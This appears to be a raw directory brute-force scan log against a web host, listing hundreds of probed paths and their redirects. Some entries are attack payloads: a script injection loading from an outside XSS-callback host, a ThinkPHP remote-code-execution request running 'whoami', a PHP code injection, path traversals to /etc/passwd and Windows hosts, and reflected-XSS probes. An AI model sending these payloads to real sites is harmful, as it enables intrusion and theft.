/%20../               (Status: 308) [Size: 6] [--> /%20..]
/%2e%2e//google.com   (Status: 308) [Size: 18] [--> /%2e%2e/google.com]
/%3f/                 (Status: 308) [Size: 4] [--> /%3f]
/..;/                 (Status: 308) [Size: 4] [--> /..;]
/.abcdefghijklmnop/   (Status: 308) [Size: 18] [--> /.abcdefghijklmnop]
/.admin/              (Status: 308) [Size: 7] [--> /.admin]
/.ansible/            (Status: 308) [Size: 9] [--> /.ansible]
/.aws/                (Status: 308) [Size: 5] [--> /.aws]
/.cfg/                (Status: 308) [Size: 5] [--> /.cfg]
/.circleci/           (Status: 308) [Size: 10] [--> /.circleci]
/.clcbio/             (Status: 308) [Size: 8] [--> /.clcbio]
/.components/         (Status: 308) [Size: 12] [--> /.components]
/.conda/              (Status: 308) [Size: 7] [--> /.conda]
/.config/             (Status: 308) [Size: 8] [--> /.config]
/.configuration/      (Status: 308) [Size: 15] [--> /.configuration]
/.controls/           (Status: 308) [Size: 10] [--> /.controls]
/.cpan/               (Status: 308) [Size: 6] [--> /.cpan]
/.cpanm/              (Status: 308) [Size: 7] [--> /.cpanm]
/.cpanel/caches/config/ (Status: 308) [Size: 22] [--> /.cpanel/caches/config]
/.cpcache/            (Status: 308) [Size: 9] [--> /.cpcache]
/.data/               (Status: 308) [Size: 6] [--> /.data]
/.dbus/               (Status: 308) [Size: 6] [--> /.dbus]
/.docker/             (Status: 308) [Size: 8] [--> /.docker]
/.docs/               (Status: 308) [Size: 6] [--> /.docs]
/.dropbox/            (Status: 308) [Size: 9] [--> /.dropbox]
/.dynamodb/           (Status: 308) [Size: 10] [--> /.dynamodb]
/.elixir_ls/          (Status: 308) [Size: 11] [--> /.elixir_ls]
/.emails/             (Status: 308) [Size: 8] [--> /.emails]
/.ensime_cache/       (Status: 308) [Size: 14] [--> /.ensime_cache]
/.ensime_lucene/      (Status: 308) [Size: 15] [--> /.ensime_lucene]
/.externaltoolbuilders/ (Status: 308) [Size: 22] [--> /.externaltoolbuilders]
/.filezilla/          (Status: 308) [Size: 11] [--> /.filezilla]
/.fop/                (Status: 308) [Size: 5] [--> /.fop]
/.fusebox/            (Status: 308) [Size: 9] [--> /.fusebox]
/.git/branches/       (Status: 308) [Size: 14] [--> /.git/branches]
/.git/                (Status: 308) [Size: 5] [--> /.git]
/.git-rewrite/        (Status: 308) [Size: 13] [--> /.git-rewrite]
/.git/hooks/          (Status: 308) [Size: 11] [--> /.git/hooks]
/.git/info/           (Status: 308) [Size: 10] [--> /.git/info]
/.git/logs/           (Status: 308) [Size: 10] [--> /.git/logs]
/.git/objects/        (Status: 308) [Size: 13] [--> /.git/objects]
/.github/             (Status: 308) [Size: 8] [--> /.github]
/.gitignore/          (Status: 308) [Size: 11] [--> /.gitignore]
/.gnome/              (Status: 308) [Size: 7] [--> /.gnome]
/.gnupg/              (Status: 308) [Size: 7] [--> /.gnupg]
/.gwt-tmp/            (Status: 308) [Size: 9] [--> /.gwt-tmp]
/.gwt/                (Status: 308) [Size: 5] [--> /.gwt]
/.hg/                 (Status: 308) [Size: 4] [--> /.hg]
/.hg/store/data/      (Status: 308) [Size: 15] [--> /.hg/store/data]
/.hypothesis/         (Status: 308) [Size: 12] [--> /.hypothesis]
/.idea/libraries/     (Status: 308) [Size: 16] [--> /.idea/libraries]
/.interproscan-5/     (Status: 308) [Size: 16] [--> /.interproscan-5]
/.jekyll-cache/       (Status: 308) [Size: 14] [--> /.jekyll-cache]
/.lein-plugins/       (Status: 308) [Size: 14] [--> /.lein-plugins]
/.localhistory/       (Status: 308) [Size: 14] [--> /.localhistory]
/.m/                  (Status: 308) [Size: 3] [--> /.m]
/.masterpages/        (Status: 308) [Size: 13] [--> /.masterpages]
/.mypy_cache/         (Status: 308) [Size: 12] [--> /.mypy_cache]
/.nb-gradle/          (Status: 308) [Size: 11] [--> /.nb-gradle]
/.navigation/         (Status: 308) [Size: 12] [--> /.navigation]
/.nv/                 (Status: 308) [Size: 4] [--> /.nv]
/.oracle_jre_usage/   (Status: 308) [Size: 18] [--> /.oracle_jre_usage]
/.rpt2_cache/         (Status: 308) [Size: 12] [--> /.rpt2_cache]
/.rts2_cache_cjs/     (Status: 308) [Size: 16] [--> /.rts2_cache_cjs]
/.rts2_cache_es/      (Status: 308) [Size: 15] [--> /.rts2_cache_es]
/.rts2_cache_umd/     (Status: 308) [Size: 16] [--> /.rts2_cache_umd]
/.thunderbird/        (Status: 308) [Size: 13] [--> /.thunderbird]
/.tools/phpmyadmin/   (Status: 308) [Size: 18] [--> /.tools/phpmyadmin]
/.tools/phpmyadmin/current/ (Status: 308) [Size: 26] [--> /.tools/phpmyadmin/current]
/.vs/                 (Status: 308) [Size: 4] [--> /.vs]
/.well-known/acme-challenge/dtfy (Status: 301) [Size: 0] [--> https://va-acm.heroku.com/challenge?host=samltool.io&token=dtfy]
/.x-formation/        (Status: 308) [Size: 13] [--> /.x-formation]
/1c/                  (Status: 308) [Size: 3] [--> /1c]
/7788bdbc/gallery/index/ajaxproxy/ (Status: 308) [Size: 33] [--> /7788bdbc/gallery/index/ajaxproxy]
/7788bdbc/gallery/index/imageedit/7/ (Status: 308) [Size: 35] [--> /7788bdbc/gallery/index/imageedit/7]
/[jetbox-directory]/  (Status: 308) [Size: 19] [--> /[jetbox-directory]]
/a4j/s/3_3_3.finalorg/richfaces/renderkit/html/css/basic_classes.xcss/datb/ (Status: 308) [Size: 74] [--> /a4j/s/3_3_3.finalorg/richfaces/renderkit/html/css/basic_classes.xcss/datb]
/a4j/g/3_3_1.gaorg.richfaces.renderkit.html.paint2dresource/data/ (Status: 308) [Size: 64] [--> /a4j/g/3_3_1.gaorg.richfaces.renderkit.html.paint2dresource/data]
/a4j/s/3_3_3.finalorg.ajax4jsf.resource.userresource/n/n/data/ (Status: 308) [Size: 61] [--> /a4j/s/3_3_3.finalorg.ajax4jsf.resource.userresource/n/n/data]
/ab/                  (Status: 308) [Size: 3] [--> /ab]
/abarth/tests/secure-transition/ (Status: 308) [Size: 31] [--> /abarth/tests/secure-transition]
/accessplatform/auth/ (Status: 308) [Size: 20] [--> /accessplatform/auth]
/accessplatform/      (Status: 308) [Size: 15] [--> /accessplatform]
/accessplatform/auth/clientscripts/ (Status: 308) [Size: 34] [--> /accessplatform/auth/clientscripts]
/account/authorize/   (Status: 308) [Size: 18] [--> /account/authorize]
/accounts/password-reset/ (Status: 308) [Size: 24] [--> /accounts/password-reset]
/achievo/modules/docmanager/doctypetemplates/ (Status: 308) [Size: 44] [--> /achievo/modules/docmanager/doctypetemplates]
/activedirectoryremoteadminscripts/ (Status: 308) [Size: 34] [--> /activedirectoryremoteadminscripts]
/activitysessions/docs/ (Status: 308) [Size: 22] [--> /activitysessions/docs]
/addressbookj2we/services/addressbook/wsdl/ (Status: 308) [Size: 42] [--> /addressbookj2we/services/addressbook/wsdl]
/addressbookw2je/services/addressbook/wsdl/ (Status: 308) [Size: 42] [--> /addressbookw2je/services/addressbook/wsdl]
/admin//accounts/userprofile (Status: 308) [Size: 27] [--> /admin/accounts/userprofile]
/admin/?/login        (Status: 308) [Size: 16] [--> /admin?%2Flogin=]
/admin/?do=regstatus&action=deny&id=2 (Status: 308) [Size: 36] [--> /admin?do=regstatus&action=deny&id=2]
/admin/ajax/file-browser/upload/ (Status: 308) [Size: 31] [--> /admin/ajax/file-browser/upload]
/admin/auth/user/1/password/ (Status: 308) [Size: 27] [--> /admin/auth/user/1/password]
/admin/customer-service-plan/ (Status: 308) [Size: 28] [--> /admin/customer-service-plan]
/admin/customer-service-plan/list/reset-search/true/ (Status: 308) [Size: 51] [--> /admin/customer-service-plan/list/reset-search/true]
/admin/customer/overview/ (Status: 308) [Size: 24] [--> /admin/customer/overview]
/admin/customer/overview/id/ (Status: 308) [Size: 27] [--> /admin/customer/overview/id]
/admin/health/chart-image/ (Status: 308) [Size: 25] [--> /admin/health/chart-image]
/admin/home/click-promo/ (Status: 308) [Size: 23] [--> /admin/home/click-promo]
/admin/home/click-promo/id/ (Status: 308) [Size: 26] [--> /admin/home/click-promo/id]
/admin/js/tinymce/    (Status: 308) [Size: 17] [--> /admin/js/tinymce]
/admin/phpmyadmin/    (Status: 308) [Size: 17] [--> /admin/phpmyadmin]
/admin/plugins/mediagallery/xppubwiz/ (Status: 308) [Size: 36] [--> /admin/plugins/mediagallery/xppubwiz]
/admin/productimages/ (Status: 308) [Size: 20] [--> /admin/productimages]
/admin/promotion/mobile-monitor/ (Status: 308) [Size: 31] [--> /admin/promotion/mobile-monitor]
/admin/relreject/table_json/ (Status: 308) [Size: 27] [--> /admin/relreject/table_json]
/admin/reseller/list/ (Status: 308) [Size: 20] [--> /admin/reseller/list]
/admin/reseller/list/reset-search/true/ (Status: 308) [Size: 38] [--> /admin/reseller/list/reset-search/true]
/admin/reseller/login-info/ (Status: 308) [Size: 26] [--> /admin/reseller/login-info]
/admin/reseller/personal-info/ (Status: 308) [Size: 29] [--> /admin/reseller/personal-info]
/admin/reseller/tools/id/1/ (Status: 308) [Size: 26] [--> /admin/reseller/tools/id/1]
/admin/reseller/tools/id/ (Status: 308) [Size: 24] [--> /admin/reseller/tools/id]
/admin/reseller/tools/ (Status: 308) [Size: 21] [--> /admin/reseller/tools]
/admin/subscription/  (Status: 308) [Size: 19] [--> /admin/subscription]
/admin/subscription/list/reset-search/true/ (Status: 308) [Size: 42] [--> /admin/subscription/list/reset-search/true]
/admin/subscription/login/ (Status: 308) [Size: 25] [--> /admin/subscription/login]
/admin/subscription/login/id/1/ (Status: 308) [Size: 30] [--> /admin/subscription/login/id/1]
/admin/subscription/login/id/ (Status: 308) [Size: 28] [--> /admin/subscription/login/id]
/admin/subscription/login/id/1/pageurl/ (Status: 308) [Size: 38] [--> /admin/subscription/login/id/1/pageurl]
/admin/subscription/login/id/1/pageurl/app/available/ (Status: 308) [Size: 52] [--> /admin/subscription/login/id/1/pageurl/app/available]
/admin/subscription/login/id/1/pageurl/app/ (Status: 308) [Size: 42] [--> /admin/subscription/login/id/1/pageurl/app]
/admin/subscription/login/id/1/pageurl/app/available/id/ (Status: 308) [Size: 55] [--> /admin/subscription/login/id/1/pageurl/app/available/id]
/admin/subscription/login/id/2/ (Status: 308) [Size: 30] [--> /admin/subscription/login/id/2]
/admin/update/settings/ (Status: 308) [Size: 22] [--> /admin/update/settings]
/admin/user/read_awards/ (Status: 308) [Size: 23] [--> /admin/user/read_awards]
/admincp/js/kindeditor/ (Status: 308) [Size: 22] [--> /admincp/js/kindeditor]
/administrator-login/ (Status: 308) [Size: 20] [--> /administrator-login]
/administrator/admin/ (Status: 308) [Size: 20] [--> /administrator/admin]
/administrator/components/com_kochsuite/ (Status: 308) [Size: 39] [--> /administrator/components/com_kochsuite]
/administrator/db/    (Status: 308) [Size: 17] [--> /administrator/db]
/administrator/phpmyadmin/ (Status: 308) [Size: 25] [--> /administrator/phpmyadmin]
/administratorlogin/  (Status: 308) [Size: 19] [--> /administratorlogin]
/albumcatalogweb/docs/ (Status: 308) [Size: 21] [--> /albumcatalogweb/docs]
/albumcatalogweb/docsservlet/ (Status: 308) [Size: 28] [--> /albumcatalogweb/docsservlet]
/albumcatalogwebservlet/ (Status: 308) [Size: 23] [--> /albumcatalogwebservlet]
/app/asp//contacts    (Status: 308) [Size: 17] [--> /app/asp/contacts]
/application/logs/    (Status: 308) [Size: 17] [--> /application/logs]
/applicationprofilesample/docs/ (Status: 308) [Size: 30] [--> /applicationprofilesample/docs]
/applicationprofilesample/ (Status: 308) [Size: 25] [--> /applicationprofilesample]
/applicationprofilesampleservlet/ (Status: 308) [Size: 32] [--> /applicationprofilesampleservlet]
/applications/billboardmanager/ (Status: 308) [Size: 30] [--> /applications/billboardmanager]
/atutor/browse/jscripts/infusion/framework/fss/ (Status: 308) [Size: 46] [--> /atutor/browse/jscripts/infusion/framework/fss]
/atutor/login/jscripts/infusion/ (Status: 308) [Size: 31] [--> /atutor/login/jscripts/infusion]
/atutor/login/mods/_standard/flowplayer/ (Status: 308) [Size: 39] [--> /atutor/login/mods/_standard/flowplayer]
/bea_wls_internal/classes/ (Status: 308) [Size: 25] [--> /bea_wls_internal/classes]
/bedita-3.5.0.corylus.2261e29/bedita/index/newsletter/viewmailgroup/ (Status: 308) [Size: 67] [--> /bedita-3.5.0.corylus.2261e29/bedita/index/newsletter/viewmailgroup]
/bigtree-cms-4.2.18/site/index/admin/ajax/developer/extensions/file-browser/ (Status: 308) [Size: 75] [--> /bigtree-cms-4.2.18/site/index/admin/ajax/developer/extensions/file-browser]
/bigtree-cms-4.2.18/site/index/admin/developer/extensions/install/ (Status: 308) [Size: 65] [--> /bigtree-cms-4.2.18/site/index/admin/developer/extensions/install]
/bigtree-cms-4.2.18/site/index/admin/developer/modules/add/ (Status: 308) [Size: 58] [--> /bigtree-cms-4.2.18/site/index/admin/developer/modules/add]
/bigtree-cms-4.2.18/site/index/admin/developer/modules/views/add/ (Status: 308) [Size: 64] [--> /bigtree-cms-4.2.18/site/index/admin/developer/modules/views/add]
/bigtree-cms-4.2.18/site/index/admin/developer/modules/views/edit/15/ (Status: 308) [Size: 68] [--> /bigtree-cms-4.2.18/site/index/admin/developer/modules/views/edit/15]
/bigtree-cms-4.2.18/site/index/admin/developer/modules/views/style/module_id/ (Status: 308) [Size: 76] [--> /bigtree-cms-4.2.18/site/index/admin/developer/modules/views/style/module_id]
/bigtree-cms-4.2.18/site/index/admin/modules_name_at_one_step/ (Status: 308) [Size: 61] [--> /bigtree-cms-4.2.18/site/index/admin/modules_name_at_one_step]
/bigtree-cms-4.2.18/site/index/admin/pages/revisions/0/ (Status: 308) [Size: 54] [--> /bigtree-cms-4.2.18/site/index/admin/pages/revisions/0]
/bigtree-cms/site/index/admin/pages/edit/p2/ (Status: 308) [Size: 43] [--> /bigtree-cms/site/index/admin/pages/edit/p2]
/bigtree-cms/site/index/admin/trees/add/ (Status: 308) [Size: 39] [--> /bigtree-cms/site/index/admin/trees/add]
/bitweaver/articles/list/ (Status: 308) [Size: 24] [--> /bitweaver/articles/list]
/bitweaver/articles/edit/ (Status: 308) [Size: 24] [--> /bitweaver/articles/edit]
/bitweaver/blogs/list_blogs/ (Status: 308) [Size: 27] [--> /bitweaver/blogs/list_blogs]
/bitweaver/events/index/ (Status: 308) [Size: 23] [--> /bitweaver/events/index]
/bitweaver/events/list_events/ (Status: 308) [Size: 29] [--> /bitweaver/events/list_events]
/bitweaver/fisheye/list_galleries/ (Status: 308) [Size: 33] [--> /bitweaver/fisheye/list_galleries]
/bitweaver/liberty/list_content/ (Status: 308) [Size: 31] [--> /bitweaver/liberty/list_content]
/bitweaver/stencils/list_stencils/ (Status: 308) [Size: 33] [--> /bitweaver/stencils/list_stencils]
/bitweaver/users/remind_password/ (Status: 308) [Size: 32] [--> /bitweaver/users/remind_password]
/bitweaver/wiki/orphan_pages/ (Status: 308) [Size: 28] [--> /bitweaver/wiki/orphan_pages]
/bl-content/uploads/  (Status: 308) [Size: 19] [--> /bl-content/uploads]
/blog/wp-content/backup-db/ (Status: 308) [Size: 26] [--> /blog/wp-content/backup-db]
/calendar/eventimages/ (Status: 308) [Size: 21] [--> /calendar/eventimages]
/cgi-bin/bfenterprise/ (Status: 308) [Size: 21] [--> /cgi-bin/bfenterprise]
/cgi-bin/cgiwrap/~nneul/ (Status: 308) [Size: 23] [--> /cgi-bin/cgiwrap/~nneul]
/cgi-bin/erba/start/  (Status: 308) [Size: 19] [--> /cgi-bin/erba/start]
/cgi-bin/luci/;stok=d/admin/network/network/ (Status: 308) [Size: 43] [--> /cgi-bin/luci/;stok=d/admin/network/network]
/cgi-bin/maconomy/maconomyws.macx1.w_mcs//etc/passwd (Status: 308) [Size: 51] [--> /cgi-bin/maconomy/maconomyws.macx1.w_mcs/etc/passwd]
/cgi-bin/viewcvs/viewcvs/viewcvs/ (Status: 308) [Size: 32] [--> /cgi-bin/viewcvs/viewcvs/viewcvs]
/cgi-bin/wxis.exe/iah/ (Status: 308) [Size: 21] [--> /cgi-bin/wxis.exe/iah]
/chamilo//main/auth/inscription (Status: 308) [Size: 30] [--> /chamilo/main/auth/inscription]
/citrix/accessplatform/auth/clientscripts/ (Status: 308) [Size: 41] [--> /citrix/accessplatform/auth/clientscripts]
/citrix//accessplatform/auth/clientscripts/cookies (Status: 308) [Size: 49] [--> /citrix/accessplatform/auth/clientscripts/cookies]
/clippercms-clipper_1.3.3/manager/ (Status: 308) [Size: 33] [--> /clippercms-clipper_1.3.3/manager]
/code/subrion/panel/database/ (Status: 308) [Size: 28] [--> /code/subrion/panel/database]
/concrete5.4.2/index/login/forgot_password/ (Status: 308) [Size: 42] [--> /concrete5.4.2/index/login/forgot_password]
/contao-2.10.1/index/teachers/ (Status: 308) [Size: 29] [--> /contao-2.10.1/index/teachers]
/courses/1/my_course/uploads/_19063_1/ (Status: 308) [Size: 37] [--> /courses/1/my_course/uploads/_19063_1]
/cp/                  (Status: 308) [Size: 3] [--> /cp]
/craftedweb//aasp_includes/pages/notice (Status: 308) [Size: 38] [--> /craftedweb/aasp_includes/pages/notice]
/db/                  (Status: 308) [Size: 3] [--> /db]
/dvp100/confd/docroot/cgi-bin/ (Status: 308) [Size: 29] [--> /dvp100/confd/docroot/cgi-bin]
/egroupware/phpgwapi/js/fckeditor/editor/dialog/fck_spellerpages/spellerpages/serverscripts/ (Status: 308) [Size: 91] [--> /egroupware/phpgwapi/js/fckeditor/editor/dialog/fck_spellerpages/spellerpages/serverscripts]
/engine/classes/swfupload//swfupload.swf (Status: 308) [Size: 39] [--> /engine/classes/swfupload/swfupload.swf]
/every-c99-php-shell-is-backdoored-aka-free-shells/ (Status: 308) [Size: 50] [--> /every-c99-php-shell-is-backdoored-aka-free-shells]
/extensions/extension/miscellaneous/development/php-bridge/ (Status: 308) [Size: 58] [--> /extensions/extension/miscellaneous/development/php-bridge]
/ezdir/imagecatalogue/imageview/475/ (Status: 308) [Size: 35] [--> /ezdir/imagecatalogue/imageview/475]
/favicon.ico          (Status: 200) [Size: 15406]
/fileprocessingscripts/php/uploadedfiles/ (Status: 308) [Size: 40] [--> /fileprocessingscripts/php/uploadedfiles]
/firms/?text="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 308) [Size: 83] [--> /firms?text=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fvijay922.xss.ht%3E%3C%2Fscript%3E]
/firms/?text=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 308) [Size: 83] [--> /firms?text=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fvijay922.xss.ht%3E%3C%2Fscript%3E]
/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27 (Status: 308) [Size: 101] [--> /fuel/pages/select?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('%22%20urllib.quote(xxxx)%20%22')%2B']
/geeklog/fckeditor/editor/filemanager/upload/ (Status: 308) [Size: 44] [--> /geeklog/fckeditor/editor/filemanager/upload]
/gilacms/admin/fm/?f=src../../../../../../../../../windows/system32/drivers/etc/hosts (Status: 308) [Size: 110] [--> /gilacms/admin/fm?f=src..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fdrivers%2Fetc%2Fhosts]
/greenhouseejb/services/greenhousefront/wsdl/ (Status: 308) [Size: 44] [--> /greenhouseejb/services/greenhousefront/wsdl]
/helpdeskz/?v=submit_ticket&action=displayform (Status: 308) [Size: 45] [--> /helpdeskz?v=submit_ticket&action=displayform]
/helpdezk/operator/queryviewrequest/id/ (Status: 308) [Size: 38] [--> /helpdezk/operator/queryviewrequest/id]
/homeautomation_v3_3_2/?page=conf-systemplugins (Status: 308) [Size: 46] [--> /homeautomation_v3_3_2?page=conf-systemplugins]
/homeautomation_v3_3_2/?page=conf-usercontrol (Status: 308) [Size: 44] [--> /homeautomation_v3_3_2?page=conf-usercontrol]
/html/js/misc/swfupload//swfupload.swf (Status: 308) [Size: 37] [--> /html/js/misc/swfupload/swfupload.swf]
/index                (Status: 200) [Size: 61127]
/index/2012/02/foswiki-xss-vulrble/ (Status: 308) [Size: 34] [--> /index/2012/02/foswiki-xss-vulrble]
/index/admin/developer/modules/views/add/ (Status: 308) [Size: 40] [--> /index/admin/developer/modules/views/add]
/index/admin/index/forgotpassword/ (Status: 308) [Size: 33] [--> /index/admin/index/forgotpassword]
/index/blog/hello-world/about/contact-us/ (Status: 308) [Size: 40] [--> /index/blog/hello-world/about/contact-us]
/index/dashboard/edit_myaccountdetail/ (Status: 308) [Size: 37] [--> /index/dashboard/edit_myaccountdetail]
/index/dashboard/reports/surveys/ (Status: 308) [Size: 32] [--> /index/dashboard/reports/surveys]
/index/dashboard/system/mail/importers/edit_importer/1/ (Status: 308) [Size: 54] [--> /index/dashboard/system/mail/importers/edit_importer/1]
/index/dashboard/system/mail/importers/save_importer/ (Status: 308) [Size: 52] [--> /index/dashboard/system/mail/importers/save_importer]
/index/dashboard/system/attributes/sets/ (Status: 308) [Size: 39] [--> /index/dashboard/system/attributes/sets]
/index/dashboard/system/mail/method/ (Status: 308) [Size: 35] [--> /index/dashboard/system/mail/method]
/index/dashboard/system/mail/method/save_settings/ (Status: 308) [Size: 49] [--> /index/dashboard/system/mail/method/save_settings]
/index/dashboard/users/add_group/ (Status: 308) [Size: 32] [--> /index/dashboard/users/add_group]
/index/knowledge_base/get_article_suggestion/ (Status: 308) [Size: 44] [--> /index/knowledge_base/get_article_suggestion]
/index/mail/mail/movetofolder/fromfolder/inbox/ (Status: 308) [Size: 46] [--> /index/mail/mail/movetofolder/fromfolder/inbox]
/index/mail/viewmessage/getattachment/folder/inbox/ (Status: 308) [Size: 50] [--> /index/mail/viewmessage/getattachment/folder/inbox]
/index/more/campaigns-in-pin-display/campaigns/all/search/ (Status: 308) [Size: 57] [--> /index/more/campaigns-in-pin-display/campaigns/all/search]
/index/wppg_photogallery/wppg_photo_details/ (Status: 308) [Size: 43] [--> /index/wppg_photogallery/wppg_photo_details]
/jetbox/index/view/supplynews/ (Status: 308) [Size: 29] [--> /jetbox/index/view/supplynews]
/joomla/index/dj-classifieds/ads/0/ (Status: 308) [Size: 34] [--> /joomla/index/dj-classifieds/ads/0]
/joomla160/index/using-joomla/extensions/components/content-component/article-category-list/ (Status: 308) [Size: 91] [--> /joomla160/index/using-joomla/extensions/components/content-component/article-category-list]
/joomsport_season/new-yorkers/?action=playerlist (Status: 308) [Size: 47] [--> /joomsport_season/new-yorkers?action=playerlist]
/jtaextensionssamples/transactiontracker/ (Status: 308) [Size: 40] [--> /jtaextensionssamples/transactiontracker]
/learn/concrete/concrete5.5.2.1/index/tools/required/files/bulk_properties/ (Status: 308) [Size: 74] [--> /learn/concrete/concrete5.5.2.1/index/tools/required/files/bulk_properties]
/main.nsf/h_toc/2a922d48c75dd00b052567080016723a/ (Status: 308) [Size: 48] [--> /main.nsf/h_toc/2a922d48c75dd00b052567080016723a]
/office_admin/?pid=42&action=addadmin (Status: 308) [Size: 36] [--> /office_admin?pid=42&action=addadmin]
/opc/services/brokerserviceintfport/wsdl/ (Status: 308) [Size: 40] [--> /opc/services/brokerserviceintfport/wsdl]
/ossim/control_panel/alarm_console/ (Status: 308) [Size: 34] [--> /ossim/control_panel/alarm_console]
/p/pivot-weblog/code/4487/tree//pivotx/modules/module_smarty (Status: 308) [Size: 59] [--> /p/pivot-weblog/code/4487/tree/pivotx/modules/module_smarty]
/p/pivot-weblog/code/4489/tree//pivotx/lib (Status: 308) [Size: 41] [--> /p/pivot-weblog/code/4489/tree/pivotx/lib]
/p/pivot-weblog/code/4490/tree//pivotx/lib (Status: 308) [Size: 41] [--> /p/pivot-weblog/code/4490/tree/pivotx/lib]
/p/pivot-weblog/code/4489/tree//pivotx/fileupload (Status: 308) [Size: 48] [--> /p/pivot-weblog/code/4489/tree/pivotx/fileupload]
/p/tikiwiki/code/62386/tree//tikifilter (Status: 308) [Size: 38] [--> /p/tikiwiki/code/62386/tree/tikifilter]
/p/tikiwiki/code/62386/tree//tikifilter/lang (Status: 308) [Size: 43] [--> /p/tikiwiki/code/62386/tree/tikifilter/lang]
/p/tikiwiki/code/62386/tree//tikifilter/pregfilter (Status: 308) [Size: 49] [--> /p/tikiwiki/code/62386/tree/tikifilter/pregfilter]
/photo-gallery/api/album/tree_lists/ (Status: 308) [Size: 35] [--> /photo-gallery/api/album/tree_lists]
/php-how-to-manage-uploaded-image-in-secure-way/ (Status: 308) [Size: 47] [--> /php-how-to-manage-uploaded-image-in-secure-way]
/phpmyadmin-2.11.7.1-all-languages-utf-8-only/ (Status: 308) [Size: 45] [--> /phpmyadmin-2.11.7.1-all-languages-utf-8-only]
/phpmyadmin-2.11.8.1-all-languages-utf-8-only/ (Status: 308) [Size: 45] [--> /phpmyadmin-2.11.8.1-all-languages-utf-8-only]
/plesk/admin/report/traffic-history/ (Status: 308) [Size: 35] [--> /plesk/admin/report/traffic-history]
/plesk/client@/domain@1/backup/local-repository/ (Status: 308) [Size: 47] [--> /plesk/client@/domain@1/backup/local-repository]
/plesk/client@1/domain@1/backup/ftp-repository/ (Status: 308) [Size: 46] [--> /plesk/client@1/domain@1/backup/ftp-repository]
/plesk/client@1/domain@1/backup/ftp-repository/properties/ (Status: 308) [Size: 57] [--> /plesk/client@1/domain@1/backup/ftp-repository/properties]
/plesk/client@1/domain@1/backup/local-repository/ (Status: 308) [Size: 48] [--> /plesk/client@1/domain@1/backup/local-repository]
/plesk/client@1/domain@1/backup/local-repository/upload/ (Status: 308) [Size: 55] [--> /plesk/client@1/domain@1/backup/local-repository/upload]
/plesk/client@1/domain@1/backup/task@/ (Status: 308) [Size: 37] [--> /plesk/client@1/domain@1/backup/task@]
/plesk/client@1/domain@1/hosting/file-manager/ (Status: 308) [Size: 45] [--> /plesk/client@1/domain@1/hosting/file-manager]
/plesk/client@1/domain@1/hosting/file-manager/edit/ (Status: 308) [Size: 50] [--> /plesk/client@1/domain@1/hosting/file-manager/edit]
/plesk/client@1/domain@1/hosting/file-manager/rename/ (Status: 308) [Size: 52] [--> /plesk/client@1/domain@1/hosting/file-manager/rename]
/plesk/client@1/domain@1/hosting/file-manager/view/ (Status: 308) [Size: 50] [--> /plesk/client@1/domain@1/hosting/file-manager/view]
/plesk/client@2/domain@1/hosting/file-manager/ (Status: 308) [Size: 45] [--> /plesk/client@2/domain@1/hosting/file-manager]
/plesk/client@3/domain@2/hosting/file-manager/create-dir/ (Status: 308) [Size: 56] [--> /plesk/client@3/domain@2/hosting/file-manager/create-dir]
/plesk/client@3/domain@2/hosting/file-manager/edit/ (Status: 308) [Size: 50] [--> /plesk/client@3/domain@2/hosting/file-manager/edit]
/plesk/client@3/domain@2/hosting/file-manager/permissions/ (Status: 308) [Size: 57] [--> /plesk/client@3/domain@2/hosting/file-manager/permissions]
/plesk/client@3/domain@2/hosting/file-manager/rename/ (Status: 308) [Size: 52] [--> /plesk/client@3/domain@2/hosting/file-manager/rename]
/pmachine/pm/add_ons/mail_this_entry/ (Status: 308) [Size: 36] [--> /pmachine/pm/add_ons/mail_this_entry]
/product/photogallery-project-in-php/ (Status: 308) [Size: 36] [--> /product/photogallery-project-in-php]
/product/php/e-commerce/paypal/ipn_development_handler/ (Status: 308) [Size: 54] [--> /product/php/e-commerce/paypal/ipn_development_handler]
/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami (Status: 308) [Size: 104] [--> /public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami]
/rashtml5gateway//..\\\..\\\..\\\..\\\..\\\windows\win (Status: 308) [Size: 85] [--> /rashtml5gateway/..%5C%5C%5C..%5C%5C%5C..%5C%5C%5C..%5C%5C%5C..%5C%5C%5Cwindows%5Cwin]
/rc/?_task=settings&_action=plugin.filters-save (Status: 308) [Size: 46] [--> /rc?_task=settings&_action=plugin.filters-save]
/session/phpsessid=id;injected=attribute;/ (Status: 308) [Size: 41] [--> /session/phpsessid=id;injected=attribute;]
/smartgui/media/clearsea/smartgui/media/clearsea/ (Status: 308) [Size: 48] [--> /smartgui/media/clearsea/smartgui/media/clearsea]
/smb/admin-home/featured-applications/ (Status: 308) [Size: 37] [--> /smb/admin-home/featured-applications]
/smb/app-image/gallery/catalogid/apscatalog/ (Status: 308) [Size: 43] [--> /smb/app-image/gallery/catalogid/apscatalog]
/smb/app-image/gallery/catalogid/apscatalog/type/ (Status: 308) [Size: 48] [--> /smb/app-image/gallery/catalogid/apscatalog/type]
/smb/app-image/gallery/catalogid/apscatalog/type/screenshot/ (Status: 308) [Size: 59] [--> /smb/app-image/gallery/catalogid/apscatalog/type/screenshot]
/smb/app-image/gallery/catalogid/apscatalog/type/screenshot/resourcesurl/ (Status: 308) [Size: 72] [--> /smb/app-image/gallery/catalogid/apscatalog/type/screenshot/resourcesurl]
/stockquote/services/xmltoday-delayed-quotes/wsdl/ (Status: 308) [Size: 49] [--> /stockquote/services/xmltoday-delayed-quotes/wsdl]
/themes/dashboard/assets/plugins/jquery-file-upload/server/php/ (Status: 308) [Size: 62] [--> /themes/dashboard/assets/plugins/jquery-file-upload/server/php]
/uhtbin/cgisirsi/?ps=0sk8zspd0f/main/33660028/123 (Status: 308) [Size: 54] [--> /uhtbin/cgisirsi?ps=0sk8zspd0f%2Fmain%2F33660028%2F123]
/webpages/data/_._.<img src=a onerror=alert(“reflected-xss”)>../..%2f (Status: 308) [Size: 94] [--> /webpages/data/_._.%3Cimg%20src=a%20onerror=alert%28%E2%80%9Creflected-xss%E2%80%9D%29%3E../..]
